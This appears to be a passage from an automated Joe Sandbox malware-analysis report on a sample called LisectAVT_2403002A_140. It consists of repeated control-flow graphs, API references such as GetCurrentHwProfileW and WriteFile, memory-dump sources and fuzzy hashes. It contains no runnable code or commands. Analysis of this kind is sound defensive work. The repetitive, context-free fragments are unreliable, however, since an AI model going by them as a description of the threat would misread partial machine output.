                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 3560a8804f834f023d5013b3b9b0bd052bcc1f975fe879a406547539e623c809
                                  • Instruction ID: 8cf49d33870c5c691492d759c59f10c2f140927336a3c2ea115ff0ca3a50dd4c
                                  • Opcode Fuzzy Hash: 3560a8804f834f023d5013b3b9b0bd052bcc1f975fe879a406547539e623c809
                                  • Instruction Fuzzy Hash: 2351BB75A042159FCB28DF58C4D0EA9B3B5EF44B04B29459AD849AB351D731FE05CBA0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 21 588097a-5880ae8 call 58809e9 40 5880af3-5880afc GetCurrentHwProfileW 21->40 41 5880b0e-5880d4d 40->41
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153535392.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5880000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID: {}n
                                  • API String ID: 2104809126-3130782868
                                  • Opcode ID: a79f6b3355ed0f3ab0c56e09ac90e2c5c3758b26ebc70525b68ae7a1c3c8f774
                                  • Instruction ID: 81e29e130c28db9c0a4a6ac2424b40d734be9224d8ab03cd2ff60fb893f92022
                                  • Opcode Fuzzy Hash: a79f6b3355ed0f3ab0c56e09ac90e2c5c3758b26ebc70525b68ae7a1c3c8f774
                                  • Instruction Fuzzy Hash: 8E5107EB60D218EDF212E5911B58AFA6A6FE7C3338B3084B6FC17D6142E6944E4D5131

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 69 58809c2-58809c3 70 5880983-58809ba 69->70 71 58809c5-58809c7 69->71 73 58809c8-5880ae8 call 58809e9 70->73 71->73 89 5880af3-5880afc GetCurrentHwProfileW 73->89 90 5880b0e-5880d4d 89->90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153535392.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5880000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: {}n
                                  • API String ID: 0-3130782868
                                  • Opcode ID: 2c899945bfc44f8c7904ae31a0ccef1ae831f757f4c82e4c96e558e9238e084e
                                  • Instruction ID: 8f9ff98287b9fccb860c3a7f2fc532454d73dd3bd04059e0a2c1b592f2574c5e
                                  • Opcode Fuzzy Hash: 2c899945bfc44f8c7904ae31a0ccef1ae831f757f4c82e4c96e558e9238e084e
                                  • Instruction Fuzzy Hash: 095123EB60D218EDF212E5812B58AFB666FE7C3338B308476FC17D6246E6944E4D5131

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 118 588099a-5880ae8 call 58809e9 136 5880af3-5880afc GetCurrentHwProfileW 118->136 137 5880b0e-5880d4d 136->137
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153535392.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5880000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID: {}n
                                  • API String ID: 2104809126-3130782868
                                  • Opcode ID: 3d95b0548e31fc4c6195afd52d8ddabc41834ca9597e1ae7e3c29a89b38fcb84
                                  • Instruction ID: f8de00079da344595026db5c1da47da963f54c8e54c731945c198f007b6d80ab
                                  • Opcode Fuzzy Hash: 3d95b0548e31fc4c6195afd52d8ddabc41834ca9597e1ae7e3c29a89b38fcb84
                                  • Instruction Fuzzy Hash: 4441F1EB60D218EDF212E9912B58AFB666FE7C3738B308476FC07D6242E6944E4D5131

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 165 58809ac-5880ae8 call 58809e9 181 5880af3-5880afc GetCurrentHwProfileW 165->181 182 5880b0e-5880d4d 181->182
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153535392.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5880000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID: {}n
                                  • API String ID: 2104809126-3130782868
                                  • Opcode ID: 847b8f144d6c2a30c03a9f7d25e97c6184db2fce5a451007ae1f116dcbb60bfd
                                  • Instruction ID: e849d73ff684fe8c5c302e98fc6db43e6e31c585f259aebfcbe037b37632c804
                                  • Opcode Fuzzy Hash: 847b8f144d6c2a30c03a9f7d25e97c6184db2fce5a451007ae1f116dcbb60bfd
                                  • Instruction Fuzzy Hash: B241F2EB60D218EDF212E5912B58AFA666FE7C3738B308476FC07D6142E6944E4D5131

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 251 5880a21-5880ae8 261 5880af3-5880afc GetCurrentHwProfileW 251->261 262 5880b0e-5880d4d 261->262
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 05880AF7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153535392.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5880000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID: {}n
                                  • API String ID: 2104809126-3130782868
                                  • Opcode ID: af4f5a5d55a304b799ffc9b4fd64587b19a12c0b4cf71f638a52dd213ee9eebb
                                  • Instruction ID: 6538eead7ea1fdf081ad8a963716c8add2fb6a2bfe67427748c717f900394235
                                  • Opcode Fuzzy Hash: af4f5a5d55a304b799ffc9b4fd64587b19a12c0b4cf71f638a52dd213ee9eebb
                                  • Instruction Fuzzy Hash: C541BEFB20D11CFDB212E9812B28EF766AFE6C6738B308466FC07D6506E6944E8D5131

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 290 5880a2e-5880ae8 299 5880af3-5880afc GetCurrentHwProfileW 290->299 300 5880b0e-5880d4d 299->300
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 05880AF7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153535392.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5880000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID: {}n
                                  • API String ID: 2104809126-3130782868
                                  • Opcode ID: 48b7d24dea961620d5b5726c37661ad850c2a65c89c610628f8609addf1da65b
                                  • Instruction ID: 77650be23e2597eaeb075fb028f1998a8921b401995c8f6e7247a884b0535ce9
                                  • Opcode Fuzzy Hash: 48b7d24dea961620d5b5726c37661ad850c2a65c89c610628f8609addf1da65b
                                  • Instruction Fuzzy Hash: 0341BCFB20C11CFDB612E9822B18EFB66AFE6C67387308462FC07D6506E6944E8D5131

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 328 5880a4a-5880ae8 336 5880af3-5880afc GetCurrentHwProfileW 328->336 337 5880b0e-5880d4d 336->337
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 05880AF7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153535392.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5880000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID: {}n
                                  • API String ID: 2104809126-3130782868
                                  • Opcode ID: b14890acd43c2e2cae82c13cdd090092ddf06b3fa0d98a80bfbda2c401214f3b
                                  • Instruction ID: 8ea826dd0008b243b67286ac8960070a28c4612f8e92aeec7921c89a442a4543
                                  • Opcode Fuzzy Hash: b14890acd43c2e2cae82c13cdd090092ddf06b3fa0d98a80bfbda2c401214f3b
                                  • Instruction Fuzzy Hash: 9D31BDFB60C11CFDB212E9822B18EFB66AFE6C67387308462FC07D6506E6944E8D5131

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 365 5880a8b-5880a91 366 5880b0a-5880b0b 365->366 367 5880a93-5880a9b 365->367 370 5880b0e-5880d4d 366->370 368 5880a9d-5880aa1 367->368 369 5880aa2-5880ae8 367->369 368->369 375 5880af3-5880afc GetCurrentHwProfileW 369->375 375->370
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 05880AF7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153535392.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5880000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID: {}n
                                  • API String ID: 2104809126-3130782868
                                  • Opcode ID: 53917405ea156a1d76801d2e164fd8fcd4b2b528975a2225d06cf986fbe85c30
                                  • Instruction ID: 1ae63a1b1f42bd997774e985c2a20764a9ecda58c1ea01e9bb9105fbe006ff16
                                  • Opcode Fuzzy Hash: 53917405ea156a1d76801d2e164fd8fcd4b2b528975a2225d06cf986fbe85c30
                                  • Instruction Fuzzy Hash: C331B1EB60C118FDB212E9812B58EFA6BAFE6C77387308466FC07D6246E7914E4D5131

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 401 5880a78-5880ae8 406 5880af3-5880afc GetCurrentHwProfileW 401->406 407 5880b0e-5880d4d 406->407
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 05880AF7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153535392.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5880000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID: {}n
                                  • API String ID: 2104809126-3130782868
                                  • Opcode ID: d71fc074752f754cde22658ff49b8c05d1991165f2b29f65657f7bf435dae9f8
                                  • Instruction ID: c405fdaea113e6ba4e50d8e02d04a2c5d889628dba6e4bc0ee7eff8520702065
                                  • Opcode Fuzzy Hash: d71fc074752f754cde22658ff49b8c05d1991165f2b29f65657f7bf435dae9f8
                                  • Instruction Fuzzy Hash: FE31CFFB20C218FDB612E9812B18EFA66AFE6C77387308466FC07D6106E7944E4D9131

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 435 5880aa8-5880ae8 437 5880af3-5880afc GetCurrentHwProfileW 435->437 438 5880b0e-5880d4d 437->438
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 05880AF7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153535392.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5880000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID: {}n
                                  • API String ID: 2104809126-3130782868
                                  • Opcode ID: c4fdf037427200237ee2d93815f817a99d844d1a98c786de7b3feb04a3ae135e
                                  • Instruction ID: 0f75071667b5f84dc809ef2066cdcd459ddedf8524fbd7abf32bf97e05bb52b1
                                  • Opcode Fuzzy Hash: c4fdf037427200237ee2d93815f817a99d844d1a98c786de7b3feb04a3ae135e
                                  • Instruction Fuzzy Hash: 8131BEEB20C118FDB252E9812B18AFA66AFE7C37387308472FC07D6246E7944E4D5131

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 466 5880aed-5880af1 467 5880af3-5880afc GetCurrentHwProfileW 466->467 468 5880ab6-5880ae8 466->468 470 5880b0e-5880d4d 467->470 468->467
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 05880AF7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153535392.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5880000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID: {}n
                                  • API String ID: 2104809126-3130782868
                                  • Opcode ID: c330ac68956a99b38e84efce325649ca56814418e7a6f095b2250ff1e30cc69c
                                  • Instruction ID: 6e43bcb00acfb4252b19b8c63fd89b93a1f1c61fe2359b0c26f072776a653ef8
                                  • Opcode Fuzzy Hash: c330ac68956a99b38e84efce325649ca56814418e7a6f095b2250ff1e30cc69c
                                  • Instruction Fuzzy Hash: 9731C1FB20C118EDB212E9822B18AFB66AFE7C27387308472FC07D6246E7944E4D5131

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 498 e04942-e0494f 499 e04951-e04974 call e04723 498->499 500 e04979-e0498d call e15f82 498->500 505 e04ae0-e04ae2 499->505 506 e04992-e0499b call e0e11f 500->506 507 e0498f 500->507 509 e049a0-e049af 506->509 507->506 510 e049b1 509->510 511 e049bf-e049c8 509->511 512 e049b7-e049b9 510->512 513 e04a89-e04a8e 510->513 514 e049ca-e049d7 511->514 515 e049dc-e04a10 511->515 512->511 512->513 516 e04ade-e04adf 513->516 517 e04adc 514->517 518 e04a12-e04a1c 515->518 519 e04a6d-e04a79 515->519 516->505 517->516 520 e04a43-e04a4f 518->520 521 e04a1e-e04a2a 518->521 522 e04a90-e04a93 519->522 523 e04a7b-e04a82 519->523 520->522 526 e04a51-e04a6b call e04e59 520->526 521->520 525 e04a2c-e04a3e call e04cae 521->525 524 e04a96-e04a9e 522->524 523->513 527 e04aa0-e04aa6 524->527 528 e04ada 524->528 525->516 526->524 531 e04aa8-e04abc call e04ae3 527->531 532 e04abe-e04ac2 527->532 528->517 531->516 536 e04ac4-e04ad2 call e24a10 532->536 537 e04ad5-e04ad7 532->537 536->537 537->528
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: O
                                  • API String ID: 0-1003900172
                                  • Opcode ID: 6dd8a39adf44e6e22b67b331b9d5f467a46f61c2ee85d80b5f560068db17ac23
                                  • Instruction ID: c0c0002f4fa056b4908c1903c81d1283a65237b14587e0fcaf87d296986a6ab3
                                  • Opcode Fuzzy Hash: 6dd8a39adf44e6e22b67b331b9d5f467a46f61c2ee85d80b5f560068db17ac23
                                  • Instruction Fuzzy Hash: 4951B7F0B00108AFDF14DF58C941AAABBF1EF89354F249158F9496B2D2E3719E81CB90

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 541 5880ad2-5880ae8 543 5880af3-5880afc GetCurrentHwProfileW 541->543 544 5880b0e-5880d4d 543->544
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 05880AF7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4153535392.0000000005880000.00000040.00001000.00020000.00000000.sdmp, Offset: 05880000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5880000_LisectAVT_2403002A_140.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID: {}n
                                  • API String ID: 2104809126-3130782868
                                  • Opcode ID: 53373867391c24f05c0300e6e7dce6e2d6c3d698d03f5baca736e57064c911de
                                  • Instruction ID: 16093d9234e5425c8741ba47e4722a85954899e17e538c25dbf690636568785c
                                  • Opcode Fuzzy Hash: 53373867391c24f05c0300e6e7dce6e2d6c3d698d03f5baca736e57064c911de
                                  • Instruction Fuzzy Hash: 9231C1FB60C11CEDB212E9811B18AF766AFE7C67387308462FC07DA146E7A04E4D9130
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f87ea318735bf93fa886d17571dabad0c6021ff069577edaab22609ed760afb8
                                  • Instruction ID: 5c31d36a620e160544f3308a8dcb40e9f9e04e41f3169f7fe4dbd6fb12eed9b5
                                  • Opcode Fuzzy Hash: f87ea318735bf93fa886d17571dabad0c6021ff069577edaab22609ed760afb8
                                  • Instruction Fuzzy Hash: 28B1D0B0A04249AFDB159FA9E841BEEBBF1AF85304F146158F550BB3D2C7709D81CB60
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __fread_nolock
                                  • String ID:
                                  • API String ID: 2638373210-0
                                  • Opcode ID: 5ee5233dc9acc3f43b69b9799ea002ff7af5cae4de79c54e4c72077a93d55f5b
                                  • Instruction ID: 31968ab9b5ac19846eeb6c5a42c42af1d7205e6b3d11a6a42e4579e88ee37987
                                  • Opcode Fuzzy Hash: 5ee5233dc9acc3f43b69b9799ea002ff7af5cae4de79c54e4c72077a93d55f5b
                                  • Instruction Fuzzy Hash: F8711671900214AFDB14DFACEC49BAEB7E8EF41704F14856DF8099B282D7B5D94187A2
                                  APIs
                                  • WriteFile.KERNELBASE(?,00000000,00E09087,?,00000000,00000000,00000000,?,00000000,?,00D2A3EB,00E09087,00000000,00D2A3EB,?,?), ref: 00E15621
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: a54de33de4c6f77a68e747eb5ac1a9cd597f064c151fa1df11c0ecc5938852c5
                                  • Instruction ID: 1778f1c028e369fbeb63ecfeb22aa85c4639933c1a563ee1ef4db26dd8999dd1
                                  • Opcode Fuzzy Hash: a54de33de4c6f77a68e747eb5ac1a9cd597f064c151fa1df11c0ecc5938852c5
                                  • Instruction Fuzzy Hash: 8D61D4B2D00509EFDF11DFA8C844EEEBBBAAF89308F541149E800B7255D371D981CBA0
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00D906AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID:
                                  • API String ID: 118556049-0
                                  • Opcode ID: 318ca63d53af118050337d2617cc9b2857a3311d5737a2fcb3013cc935154a5b
                                  • Instruction ID: 5825870caf0014ef11b162317af7577ba7edb31eb510b0288f6893433ccbfd13
                                  • Opcode Fuzzy Hash: 318ca63d53af118050337d2617cc9b2857a3311d5737a2fcb3013cc935154a5b
                                  • Instruction Fuzzy Hash: 7141B172A001189FCF15DF68E9806AE7BE5AF89350F1542AAF815EB342D730DD609BF1
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00E149F9,00000000,CF830579,00E51140,0000000C,00E14AB5,00E08BBD,?), ref: 00E14B68
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 92c6c7bf6078766b85db76bcf9f736bd32c2c968cc82561822dd2c25a4643d29
                                  • Instruction ID: b6c5fc75219d61b1605a4c9f96937aab27b975c69e24757555b1d73bd5787fba
                                  • Opcode Fuzzy Hash: 92c6c7bf6078766b85db76bcf9f736bd32c2c968cc82561822dd2c25a4643d29
                                  • Instruction Fuzzy Hash: AB116BB374A1141AC72422B46C09FFE67C98B82778F3D221DF814BB2C2EE60ECC15155
                                  APIs
                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,00E50DF8,00D2A3EB,00000002,00D2A3EB,00000000,?,?,?,00E0E166,00000000,?,00D2A3EB,00000002,00E50DF8), ref: 00E0E098
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
